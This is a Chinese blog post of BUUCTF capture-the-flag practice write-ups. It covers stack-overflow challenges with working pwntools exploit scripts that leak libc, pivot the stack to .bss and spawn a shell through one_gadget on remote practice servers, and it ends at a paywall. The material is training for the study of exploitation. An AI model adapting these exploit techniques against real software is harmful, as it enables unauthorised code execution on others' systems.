2021-08-30 BUUCTF刷题记录PWN

最新推荐文章于 2024-07-20 17:12:48 发布
最新推荐文章于 2024-07-20 17:12:48 发布
阅读量498 收藏 1
点赞数 2
分类专栏: #BUUCTF Pwn 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56897090/article/details/120002395
版权

2021-08-30 BUUCTF刷题记录

刷题数量:13

题目分类:栈溢出、堆、pwn基础

文章目录

[Black Watch 入群题]PWN

0x00 题目描述

Black Watch 入群题
PWN

0x01 分析思路

IDA拖进去看整体功能:
MAIN:![[Pasted image 20210830173411.png]]vul:![[Pasted image 20210830173447.png]]

分析后,可以看到的漏洞

  1. 栈溢出(读入32字节存入24的数组,溢出8字节)

刚开始,我也疑惑,这8字节放payload空间不够呀,怎么办?
后面看了看前辈的wp,还利用了前面的.bss段,具体思路:

  1. 泄露libc
    1. 通过.bss段写入要运行的payload
    2. 通过8字节构造一个短payload运行.bss代码
  2. getshell
    1. one_gadget

这边涉及了一些前置知识:
leave;ret;的gadget有什么用?

leave相当于汇编代码

mov rsp,rbp
pop rbp

相当于将当前栈顶指向了rbp的地址,然后弹出rbp一段代码为EIP(x64为8位)

如果我们把.bss地址设置为rbp,并且将payload写入.bss地址,运行这段代码

payload=b"a"*(0x18)#溢出
payload+=p32(s_addr-4)#rbp
payload+=p32(leave_ret)#ret地址

我们会先执行溢出修改的gadgetleave_ret地址,然后rbp设置为s_addr-4
动态流程:

asm:

mov rsp,rbp
pop rbp
ret

rsp=rbp
EIP=rbp+4(弹出一段4字节)的内存数据
ret (相当于 jmp EIP)

执行后,就相当于将程序返回(跳转)到了.bss的代码段,然后就执行写入.bss段的payload。

0x02 EXP

整体思路

  1. 写入payload到.bss
  2. leave特性将代码跳转到.bss段
    1. 泄露lib
    2. getshell

tips:

  1. 无法getshell试试
    1. 是不是libc的问题(本地与远程不一样)
    2. 换一种方式(system、其他gadget)
from pwn import *
context.log_level="debug"
#context.arch="i386"
name="/root/spwn"
p =remote("node4.buuoj.cn",25182)
elf=ELF(name)

main_addr=elf.sym['main']
read_got=elf.got["read"]
write_plt=elf.plt['write']
pause()
payload=p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
#多试试 puts不行就write
p.sendafter(b'What is your name?',payload)



s_addr=0x0804A300

leave_ret=0x08048408 #: leave ; ret

payload=b"a"*(0x18)#24(buf)
payload+=p32(s_addr-4)
payload+=p32(leave_ret)

"""
leave=
mov rsp,rbp(rsp指向了.bss段)
pop rbp

pop eip(弹出的是.bss段的代码)
ret:
"""

#rop 正常
#payload+=p32(puts_plt)+p32(read_got)
p.sendafter(b'?',payload)#\n算1字节

leak=u32(p.recv(4))



libc=ELF("./x86/libc-2.23_buuctf.so")


libc_base=leak-libc.sym['read']

"""
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

"""
one_gadget=libc_base+0x3a80c


get=p32(one_gadget)+p32(main_addr)


p.sendafter(b"?",get)
p.sendafter(b"?",payload)

#p.sendlineafter(b'?',payload)
p.interactive()#W3lcAm3_t0_Bw

ez_pz_hackover_2016

0x00 题目描述

hackerover 2016

0x01 题目分析

IDA拖进去静态分析:
Main:![[Pasted image 20210830172237.png]]Chall:![[Pasted image 20210830172511.png]]vuln:![[Pasted image 20210830172537.png]]

大概分析程序主要的逻辑

  1. strcmp比较我们输入的字符是否为crashme
  2. 将输入的字符传入vuln函数

此题没有后门,所以我们只能利用栈溢出之类的漏洞进行ROP泄露地址
在vuln可以看到如果我们数据大小大于50就可造成栈溢出,很明显调用时传入1024长度就是栈溢出了。

如何过strcmp的同时还传入payload?

这边有一个前置知识,strlen()会遇到\x00字符截断,但其他的输入函数不会

我们利用这个特性,可以过掉strcmp,随后后门构造栈溢出的rop传给vuln完成泄露libc、getshell

0x02 思路

整体思路:

  1. 泄露libc
  2. getshell

给广大初学者说的话:

  • CTF虽然有很多的基础知识理论,但大多需要自己亲自去手动尝试,具体情况具体分析(偏向手动实验),不能太执着于学到的理论知识,需要保持一颗开放的好奇心。最主要是多自己手动动态调试才知道每一步是怎么运行的。

0x03 EXP

from pwn import *
context.log_level="debug"
context.arch="i386"
name="/root/ez_pz_hackover_2016"
p =remote("node4.buuoj.cn",27260)
elf=ELF(name)
libc=ELF("./x86/libc-2.23_buuctf.so")
main_addr=elf.sym['main']
goodgame=0x0000000000400620

printf_plt=elf.plt["printf"]
ptf_got=elf.got["printf"]
main_addr=elf.sym['main']



payload=b"crashme\x00"#过strcmp
payload+=b"a"*18+p32(printf_plt)+p32(main_addr)+p32(ptf_got)
"""
\x00可越过 strlen、strcmp
具体 动态调试确定
"""


pause()
p.sendlineafter("> ",payload)

p.recvuntil("crashme")
p.recvuntil("\n")

recvraw=p.recv(4)
leak_addr=u32(recvraw)
print("leak_addr : {}".format(hex(leak_addr)))
libc_base=leak_addr-libc.sym['printf']
one_gadget=libc_base+0x3a80c


#one_gadget getshell
payload=b"crashme\x00"
payload+=b"a"*18+p32(one_gadget)+p32(main_addr)+b"\x00"*90
p.sendlineafter("> ",payload)
p.interactive()

jarvisoj_tell_me_something

0x00 题目描述

浙大OJ的tell_me_something

0x01 题目分析

IDA进去,静态分析:

在这里插入图片描述

那么假设的整体思路:

  1. 构造栈溢出返回到gg函数gg

0x02 EXP

from pwn import *
context.log_level="debug"
context.arch="amd64"
name="/root/guestbook"
p =remote("node4.buuoj.cn",26720)
elf=ELF(name)
main_addr=elf.sym['main']
goodgame=0x0000000000400620
#main不用rbp??
payload=b"a"*(0x88)+p64(goodgame)+p64(main_addr)
pause()
p.sendlineafter(":\n",payload)
p.interactive()

Jarvisoj_level3

0x00 题目描述

[[Jarvisoj]]:浙大_OJ

level3

0x01 题目思路

拖进IDA
MAIN:
![[Pasted image 20210830171629.png]]![[Pasted image 20210830171638.png]]

分析一下,很明显有栈溢出的漏洞

接下来,这类题的套路:

  1. 构造payload泄露libc地址
  2. getshell

0x02 EXP

整体思路

  1. 栈溢出泄露libc
  2. getshell

注意的点:

  • (x86)返回地址放call之后(参数前),程序会将下一个地址识别为返回地址(即ebp)
from pwn import *
context.log_level="debug"
context.arch="i386"
name="/root/level3"
p = remote("node4.buuoj.cn",29197)
libc=ELF("./x86/libc-2.23_buuctf.so")
#p=process(name)#

elf=ELF(name)

read_got=elf.got['read']
main_addr=elf.sym['main']
write_plt=elf.plt['write']


payload=b"a"*(0x88+4)
payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
#返回地址放call之后(参数前),程序会将下一个地址识别为返回地址(即ebp)
sleep(0.2)
p.sendlineafter(b"Input:\n",payload)#leak
sleep(0.2)


leak_addr=p.recv(4).ljust(4,b"\x00")

print
最低0.47元/天 解锁文章
Ch1lkat
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISCN 2021 题目复现
树木常青的博客
05-21 1525
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 604
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4486
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
BUUCTF 加固题 babypython WriteUp
柠檬i的博客
12-06 1062
主要用了secrets模块加固,提供较安全的随机数,防止伪造session
[柏鹭杯 2021]baby_python
liaochonxiang的博客
03-19 305
可见核心代码在baby_core.pyc中,也就是在baby.exe_extracted\PYZ-00.pyz_extracted\baby_python中。pyinstxtractor解包,发现需要python3.7本版,不然解出来了,会发现PYZ-00.pyz_extracted文件夹中什么也没有。会有许多报错,也是正常的,因为PYZ-00.pyz_extracted目录下的文件被加密了。baby_python\baby_core.pyc.encrypted也是被加密的。接下来写个文件解密脚本。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
BugKu-CTF(杂项misc)--YST的小游戏/easy_python
Nailaoyyds的博客
05-20 1154
目录 题解 bmp文件wbstego分解 十六进制转字符 碰撞脚本取最小值 题解 bmp文件wbstego分解 十六进制转字符 十六进制转字符 23636F64696E673D7574662D380A0A696D706F7274206F732C746872656164696E670A0A636C617373207573657228293A0A202020204D41585F48503D3430300A2020202048503D3430300A202020204.......
2021-CISCN-fianl-ezj4va
feng的博客
03-04 4774
2021-CISCN-fianl-ezj4va 前言 去年国赛决赛的0解Java,后来出现在了DASCTF八月挑战赛,当时不太会Java所以没有看,今天找个时间复现了一下。写的比较简单,具体可以看参考链接中的文章。 代码审计 访问/robots.txt得到文件名可以下载到源码。 pom.xml: <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 789
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
使用Python的Turtle库绘制动态风车
最新发布
爱写代码的小朋友
07-20 378
python绘制风车
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 438
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 431
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
N7翻译实战
tjl521314_21的博客
07-17 335
本周完成项目实战用于训练一个简单的序列到序列(seq2seq)模型以实现英语到法语的翻译。数据预处理、模型构建、训练以及可视化损失的过程。本周学习了构建和训练一个简单的seq2seq模型用于英语到法语的翻译,对前面的知识做了一个综合的运用。
python训练模型报错:BrokenPipeError: [Errno 32] Broken pipe
Dxy1239310216的博客
07-18 563
如果问题持续存在,并且你的项目不是必须在 Windows 上运行,考虑在 Unix/Linux 系统上运行你的代码。确保在数据加载器中使用的任何自定义函数或类都是可序列化的,因为多进程需要能够在不同进程间传递它们。进行多进程数据加载时尤其常见,尤其是在 Windows 系统上,因为 Windows 对多进程的支持与 Unix/Linux 系统有所不同。有时候,错误可能是由其他部分的代码引起的,而不是直接由数据加载器引起。如果问题依然存在,你可能需要更详细地检查你的代码或寻求更专业的帮助。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值